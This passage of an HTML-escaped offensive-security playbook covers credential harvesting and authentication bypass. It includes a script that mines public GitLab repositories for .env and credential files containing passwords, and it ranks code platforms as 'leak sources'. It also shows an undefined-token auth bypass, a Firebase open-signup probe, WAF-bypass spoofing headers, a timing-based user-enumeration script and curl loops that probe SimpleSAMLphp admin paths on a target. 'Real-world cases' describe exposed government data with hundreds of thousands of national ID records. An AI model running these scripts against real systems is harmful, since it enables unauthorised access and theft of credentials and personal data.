&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; check_sa_access(token, sa[&lt;span style="color:#a6d189"&gt;&amp;#39;project_id&amp;#39;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="143-gitlab--public-repositories" &gt;
&lt;div&gt;
&lt;a href="#143-gitlab--public-repositories"&gt;
##
&lt;/a&gt;
14.3 GitLab — Public Repositories
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Search public projects&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#34;https://gitlab.com/api/v4/projects?search=env+DB_PASSWORD&amp;amp;per_page=20&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; proj &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;json():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Try to read sensitive files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; file &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; [&lt;span style="color:#a6d189"&gt;&amp;#39;.env&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;config/database.yml&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;credentials.json&amp;#39;&lt;/span&gt;]:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r2 &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;https://gitlab.com/api/v4/projects/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;proj[&lt;span style="color:#a6d189"&gt;&amp;#39;id&amp;#39;&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/repository/files/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;file&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/raw?ref=main&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; r2&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;200&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;and&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;password&amp;#39;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; r2&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;lower():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;🔥 &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;proj[&lt;span style="color:#a6d189"&gt;&amp;#39;path_with_namespace&amp;#39;&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;file&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If self-hosted GitLab is found:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# https://gitlab.empresa.com.br/api/v4/projects?visibility=public&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Government agency — Self-hosted GitLab with 3 public repositories, including the full Internal Helpdesk source code with:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;servidores_sigrh.json&lt;/code&gt;: 461,304 records with CPF (SSN), registration, unit&lt;/li&gt;
&lt;li&gt;&lt;code&gt;.env.example&lt;/code&gt;: MongoDB host, LDAP, email server&lt;/li&gt;
&lt;li&gt;&lt;code&gt;deploy.sh&lt;/code&gt;: Internal IP 10.11.82.75, blue/green deploy strategy&lt;/li&gt;
&lt;li&gt;&lt;code&gt;docker-compose.prod.yml&lt;/code&gt;: production configuration&lt;/li&gt;
&lt;li&gt;&lt;code&gt;.gitlab-ci.yml&lt;/code&gt;: CI/CD tokens, runners&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/register&lt;/code&gt; as an existing route in the code&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="144-docker-hub-npm-search-engines" &gt;
&lt;div&gt;
&lt;a href="#144-docker-hub-npm-search-engines"&gt;
##
&lt;/a&gt;
14.4 Docker Hub, NPM, Search Engines
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Platform&lt;/th&gt;
&lt;th&gt;Effectiveness&lt;/th&gt;
&lt;th&gt;Note&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;GitHub (with token)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;Best free leak source&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;GitLab (self-hosted)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;⭐⭐⭐⭐&lt;/td&gt;
&lt;td&gt;If the target has a public GitLab&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Docker Hub&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;⭐&lt;/td&gt;
&lt;td&gt;Low volume, rarely useful&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;NPM Registry&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;⭐&lt;/td&gt;
&lt;td&gt;Only legitimate packages&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Bing/Yandex&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;⭐&lt;/td&gt;
&lt;td&gt;Block scraping&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;DuckDuckGo&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;⭐&lt;/td&gt;
&lt;td&gt;Blocks heavy scraping&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;hr&gt;
&lt;h2 id="15-authentication--bypass" &gt;
&lt;div&gt;
&lt;a href="#15-authentication--bypass"&gt;
#
&lt;/a&gt;
15. AUTHENTICATION &amp;amp; BYPASS
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="151-token-bypass-undefined--undefined" &gt;
&lt;div&gt;
&lt;a href="#151-token-bypass-undefined--undefined"&gt;
##
&lt;/a&gt;
15.1 Token Bypass (undefined === undefined)
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;If the server validation compares values that may be &lt;code&gt;undefined&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// VULNERABLE CODE
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; (req.headers[&lt;span style="color:#a6d189"&gt;&amp;#34;x-migration-token&amp;#34;&lt;/span&gt;] &lt;span style="color:#99d1db;font-weight:bold"&gt;===&lt;/span&gt; process.env.MIGRATION_TOKEN) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;// access granted
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// If MIGRATION_TOKEN is not defined in .env:
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// process.env.MIGRATION_TOKEN = undefined
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// req.headers[&amp;#34;x-migration-token&amp;#34;] = undefined (header not sent)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// undefined === undefined → TRUE → bypass!
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;ALWAYS test endpoints without sending the authentication header. Often the logic is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Header present + wrong value → 401&lt;/li&gt;
&lt;li&gt;Header absent → 200 (bypass due to &lt;code&gt;undefined === undefined&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="152-firebase-password-auth--test-signup" &gt;
&lt;div&gt;
&lt;a href="#152-firebase-password-auth--test-signup"&gt;
##
&lt;/a&gt;
15.2 Firebase Password Auth — Test SignUp
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test whether signUp is enabled&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;post(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;https://identitytoolkit.googleapis.com/v1/accounts:signUp?key=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;WEB_API_KEY&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; json&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#34;email&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;test@test.com&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;password&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;Test123!&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;returnSecureToken&amp;#34;&lt;/span&gt;: &lt;span style="color:#ef9f76"&gt;True&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If 200 → Registration OPEN (create account without invite)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If 400 &amp;#34;WEAK_PASSWORD&amp;#34; → registration open, weak password&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If 400 &amp;#34;OPERATION_NOT_ALLOWED&amp;#34; → disabled&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="153-api-gateway--waf-bypass" &gt;
&lt;div&gt;
&lt;a href="#153-api-gateway--waf-bypass"&gt;
##
&lt;/a&gt;
15.3 API Gateway / WAF Bypass
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Headers that bypass protections:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bypass_headers &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-Forwarded-For&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;127.0.0.1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-Real-IP&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;127.0.0.1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-Originating-IP&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;127.0.0.1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-Remote-IP&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;127.0.0.1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-Client-IP&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;127.0.0.1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-Host&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;127.0.0.1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-Forwarded-Host&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;127.0.0.1&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-Original-URL&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;/admin&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-Rewrite-URL&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;/admin&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;X-HTTP-Method-Override&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#34;GET&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test direct IP access (CDN/WAF bypass)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Many domains behind Cloudflare have the real IP accessible&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# via DNS history (SecurityTrails, DNSDB)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="154-timing-based-user-enumeration" &gt;
&lt;div&gt;
&lt;a href="#154-timing-based-user-enumeration"&gt;
##
&lt;/a&gt;
15.4 Timing-Based User Enumeration
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;time&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Response time difference reveals if user exists&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;def&lt;/span&gt; &lt;span style="color:#8caaee"&gt;timing_test&lt;/span&gt;(url, username, password&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;wrongpass&amp;#34;&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; start &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; time&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;time()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;post(url, json&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#34;email&amp;#34;&lt;/span&gt;: username, &lt;span style="color:#a6d189"&gt;&amp;#34;password&amp;#34;&lt;/span&gt;: password})
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; elapsed &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; (time&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;time() &lt;span style="color:#99d1db;font-weight:bold"&gt;-&lt;/span&gt; start) &lt;span style="color:#99d1db;font-weight:bold"&gt;*&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;1000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;return&lt;/span&gt; elapsed
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If admin@target.com → 896ms, fake@target.com → 572ms&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Difference &amp;gt; 200ms confirms user enumeration&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Corporate intranet — 200-300ms timing oracle between valid and invalid user, allowing complete enumeration of all system users.&lt;/p&gt;
&lt;h3 id="155-saml--simplesamlphp--reconnaissance-and-exploitation" &gt;
&lt;div&gt;
&lt;a href="#155-saml--simplesamlphp--reconnaissance-and-exploitation"&gt;
##
&lt;/a&gt;
15.5 SAML / SimpleSAMLphp — Reconnaissance and Exploitation
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;SAML (Security Assertion Markup Language) is used in corporate/government SSOs. SimpleSAMLphp is the most common implementation in government.&lt;/p&gt;
&lt;h4 id="idp-discovery" &gt;
&lt;div&gt;
&lt;a href="#idp-discovery"&gt;
###
&lt;/a&gt;
IdP Discovery
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Common SAML IdP URLs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; path in /saml2/idp/metadata.php /simplesaml/saml2/idp/metadata.php &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; /module.php/saml/idp/metadata.php /Shibboleth.sso/Metadata &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; /simplesaml/module.php/saml/sp/metadata.php; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;code&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;curl -sk -o /dev/null -w &lt;span style="color:#a6d189"&gt;&amp;#34;%{http_code}&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$path&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$path&lt;/span&gt;&lt;span style="color:#a6d189"&gt; → &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$code&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SimpleSAMLphp admin (if exposed)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; path in /simplesaml/admin/ /simplesaml/module.php/admin/ &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; /module.php/admin/; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;code&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;curl -sk -o /dev/null -w &lt;span style="color:#a6d189"&gt;&amp;#34;%{http_code}&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$path&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$path&lt;/span&gt;&lt;span style="color:#a6d189"&gt; → &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$code&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If SimpleSAMLphp is not at /simplesaml/ (common behind nginx),&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# check for characteristic assets:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/assets/base/css/stylesheet.css&amp;#34;&lt;/span&gt; | head -5
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If it&amp;#39;s SimpleSAMLphp CSS, the base path has been customized&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="analyze-saml-metadata" &gt;
&lt;div&gt;
&lt;a href="#analyze-saml-metadata"&gt;
###
&lt;/a&gt;
Analyze SAML Metadata
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;The IdP&amp;rsquo;s XML metadata contains valuable information:&lt;/p&gt;
